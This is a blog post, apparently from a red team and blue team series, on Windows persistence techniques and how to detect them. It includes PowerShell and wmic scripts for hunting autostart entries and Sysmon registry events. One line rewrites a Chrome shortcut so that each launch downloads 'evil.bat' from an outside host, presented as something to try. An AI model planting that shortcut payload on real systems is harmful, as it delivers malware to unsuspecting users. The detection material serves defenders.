Maintain Local Persistence

Mohan reddy
Redteam & Blueteam Series
5 min read · May 3, 2020

Once an attacker has exploited a system, they try to maintain a foothold (persistence). Persistence is any access, action, or configuration change to a system that gives an adversary a persistent presence on that system. Adversaries often need to maintain access to systems through interruptions such as system restarts, loss of credentials, or other failures that would require a remote access tool to restart or an alternate backdoor for them to regain access.

Red Team: Attack vectors and Techniques

The attacker maintains a foothold in order to perform additional tasks such as installing and/or modifying services, modifying code, or adding startup code that calls back from the compromised system. An attacker can maintain persistence on a compromised system in a number of ways.

  • Registry — This is the homeland of most persistence techniques; I have noted every single registry location I came across during my threat hunting and while performing persistence activities.
  • Services (local and remote)
  • Scheduled Tasks/Cron Jobs — An advantage of the Windows Task Scheduler for an attacker is that it bypasses User Account Control (UAC) if the user has access to its graphical interface. This is possible because the task's security option runs it with the system's highest privileges.
  • Application Autoruns/Startup locations/Logon Scripts
  • Drivers — Kernel modules; this kind of persistence is typical of rootkits.

# Check the version of the SMB driver that WannaCry exploited
PS> (Get-Item C:\Windows\System32\drivers\srv.sys).VersionInfo

  • System Firmware — BIOS and UEFI are system firmware that operate as the software interface between the OS and the hardware of a computer. Sophisticated attackers install malicious firmware updates as a means to maintain a foothold. These are hard to detect; in 2019 Kaspersky released an article on ASUS firmware attacks.
  • Browser Extensions — Malicious extensions masquerading as legitimate extensions. This technique is also used for defense evasion and C&C.
  • .bash_profile and .bashrc
  • Hijacking COM
  • Hooking — Abusing DLLs, APIs and functions for persistence.
  • Custom Providers (SSP, SIP & Trust Hijacking) — Abusing Security Support Providers (SSP) and digital signature trust providers.
  • Software Components — Third-party freeware tools such as Adobe Flash Player and Avast AV tools.
  • WMI Event Trigger — Adversaries execute arbitrary code when a specific event occurs; WMI scripts are compiled into .MOF files to evade detection.
  • Kerberos Golden Ticket — An AD persistence mechanism that requires full domain compromise. Used for both persistence and pivoting.
  • Kerberos Silver Ticket — An AD persistence mechanism that requires a service account hash. Used for persistence and escalation.
  • Web Shell/Web Script — A web shell is a script that can be uploaded to a web server to enable remote administration of the server. Web shells are also used to pivot further to internal hosts.

[Image: basic payload that was used in China Chopper]

Since there are many more tactics adversaries can abuse, for more detail I would suggest going through MITRE ATT&CK.

E.g. malware like Poweliks uses the registry for persistence, and China Chopper used a web shell.

A basic persistence mechanism is changing a handler. If you want to try it, replace the target of the shortcut with the application path followed by a download URL, so that every time the victim opens Chrome, evil.bat is downloaded:

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" http://Bottle.com/Downloads/evil.bat

There are ways to make this less noisy.

In fact, after establishing persistence, an attacker can perform the actions listed below depending on their needs.

i) Perform additional enumeration and system manipulation using management protocols and Windows built-in tools such as WinRM, WMI, SMB and SNMP.

ii) Perform ARP scans and ping sweeps

iii) Execute additional exploits

iv) Use a VPN to access the internal network

v) Conduct DNS and directory services enumeration

vi) Perform lateral movement

BLUE TEAM: Detective and Preventive Controls

No matter what area you are reviewing, you cannot identify every possible thing that can go wrong. Control frameworks are affected by many things, some of which we tend to ignore or forget as we do our analysis.

Below are the approaches we need to take for detective and preventive controls.

Endpoint level:

  1. Purchase Threat Detection & Prevention tools — Installing AV tools reduces the chance of a machine being compromised, and if that unfortunately happens, at least it will be detected so that we can take the necessary remediation actions. The registry has been my favorite place when doing threat hunting at the endpoint level.

wmic startup list full -> Displays all the programs registered at autostart locations.

wmic service list full | find /i "pathname" | find /i /v "system32" -> Lists services whose image path is outside the system32 directory; look for any suspicious process running as a service from there.
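The following PowerShell script is an added example (not from the original post) that automates the two wmic checks above and extends them to the scheduled-task and WMI event subscription locations from the red team list. The trusted roots and the key list are my assumptions; anything it reports is a candidate for review, not a confirmed finding.

```powershell
# Added example, not from the original post. Run as Administrator on the host under review.
# Trusted roots are an assumption: anything outside them is flagged for review, not declared malicious.
$trustedRoots = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64",
                  $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }
$runKeys = @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
             'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
             'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
             'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
             'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce')

function Test-TrustedPath {
    param([string]$Command)
    if (-not $Command) { return $false }
    # Pull the executable out of a command line such as "C:\x\y.exe" /arg or C:\x\y.exe /arg
    $exe = if ($Command -match '^\s*"([^"]+)"') { $Matches[1] } else { ($Command.Trim() -split '\s+')[0] }
    $exe = [Environment]::ExpandEnvironmentVariables($exe)   # handle %SystemRoot%-style paths
    foreach ($root in $trustedRoots) {
        if ($exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding($Source, $Name, $Command) {
    $findings.Add([pscustomobject]@{ Source = $Source; Name = $Name; Command = $Command })
}

# 1. Registry Run/RunOnce values (the same locations "wmic startup" reads)
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PowerShell's own metadata properties
        if (-not (Test-TrustedPath "$($p.Value)")) { Add-Finding 'Registry' "$key\$($p.Name)" $p.Value }
    }
}
# 2. Services whose binary lives outside System32/Program Files (the wmic service filter above)
foreach ($svc in Get-CimInstance Win32_Service) {
    if (-not (Test-TrustedPath $svc.PathName)) { Add-Finding 'Service' $svc.Name $svc.PathName }
}
# 3. Enabled scheduled tasks whose action executable is outside the trusted roots
foreach ($task in Get-ScheduledTask | Where-Object State -ne 'Disabled') {
    foreach ($a in $task.Actions) {
        if ($a.Execute -and -not (Test-TrustedPath $a.Execute)) { Add-Finding 'Task' $task.TaskName "$($a.Execute) $($a.Arguments)" }
    }
}
# 4. Permanent WMI event subscriptions: every filter-to-consumer binding deserves a look
foreach ($b in Get-CimInstance -Namespace root\subscription -ClassName __FilterToConsumerBinding) {
    Add-Finding 'WMI' "$($b.Filter)" "$($b.Consumer)"
}
$findings | Sort-Object Source | Format-Table -AutoSize -Wrap
```

Compare the output against a known-good baseline from the same build; legitimate vendors also install outside the trusted roots, so the list is a starting point for triage.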

2. Implementing file integrity monitoring software

3. Implementing secure group policies such as a) disallow removable media, b) restrict software installations, c) follow the principle of least privilege, d) control access to CMD, e) disable the Guest account, f) password length, g) password age limit, h) disable anonymous SID enumeration in AD, i) moderate access to the Control Panel, j) prevent browser extensions… I have only mentioned a few, but there are many policies an organization can implement.

4. Installing security patches

5. Configuring AppLocker and whitelisting/blacklisting applications based on the organization's dependencies.

6. Implementing a SIEM in the organization, integrating it with other threat detection sources and monitoring the alerts. (If possible, forward Sysmon to the SIEM and configure the SIEM to generate an alert/log whenever any of the persistence-related registry keys changes.)

7. Processes worth watching at the endpoint level:

WMIC, MSIEXEC, ICACLS, CSCRIPT, CERTUTIL, MSHTA, POWERSHELL, RUNDLL32, REGSVR32, SC, NETSH, NET, WSCRIPT, WERFAULT.
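As an added example for point 6 (not from the original post), this PowerShell snippet shows the registry-change rule in a form you can run directly on an endpoint before moving it to the SIEM: it reads Sysmon "registry value set" events (Event ID 13) from the last 24 hours and keeps only writes to autostart locations. It assumes Sysmon is installed with registry event logging enabled; the key patterns are my selection.

```powershell
# Added example, not from the original post. Requires Sysmon with RegistryEvent logging enabled.
# Key patterns are an assumption; extend them with the locations from your own hunting notes.
$autostartPatterns = @(
    '\\CurrentVersion\\Run',            # Run and RunOnce under HKLM, HKCU and WOW6432Node
    '\\CurrentVersion\\Winlogon\\',     # Userinit, Shell, Notify
    '\\Services\\[^\\]+\\(ImagePath|Parameters\\ServiceDll)$',   # service binaries
    '\\CurrentVersion\\Explorer\\(User )?Shell Folders'          # startup folder redirection
)

# Sysmon event ID 13 = RegistryEvent (Value Set); log name is Sysmon's standard channel
$filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13; StartTime = (Get-Date).AddHours(-24) }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

function Get-AutostartWrites {
    param([object[]]$SysmonEvents, [string[]]$Patterns)
    foreach ($e in $SysmonEvents) {
        # Flatten the EventData name/value pairs into a hashtable for easy access
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $matched = $Patterns | Where-Object { $data.TargetObject -match $_ } | Select-Object -First 1
        if ($matched) {
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Image   = $data.Image          # process that wrote the value
                User    = $data.User
                Target  = $data.TargetObject   # full registry path of the value
                Details = $data.Details        # new value data (the command line being persisted)
            }
        }
    }
}

Get-AutostartWrites -SysmonEvents $events -Patterns $autostartPatterns | Format-Table -AutoSize -Wrap
```

The same TargetObject patterns translate directly into a SIEM correlation rule; pair each hit with the writing Image, since installers and updaters legitimately touch these keys.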

[Image: script for web shell persistence identifier, thanks to Alparslan Akyıldız academy]

Network level:

Monitoring at the network level can be used to detect systems communicating with a C2 server.

Process level:

Preparation is the key to effective identification and response: train end users at regular intervals.
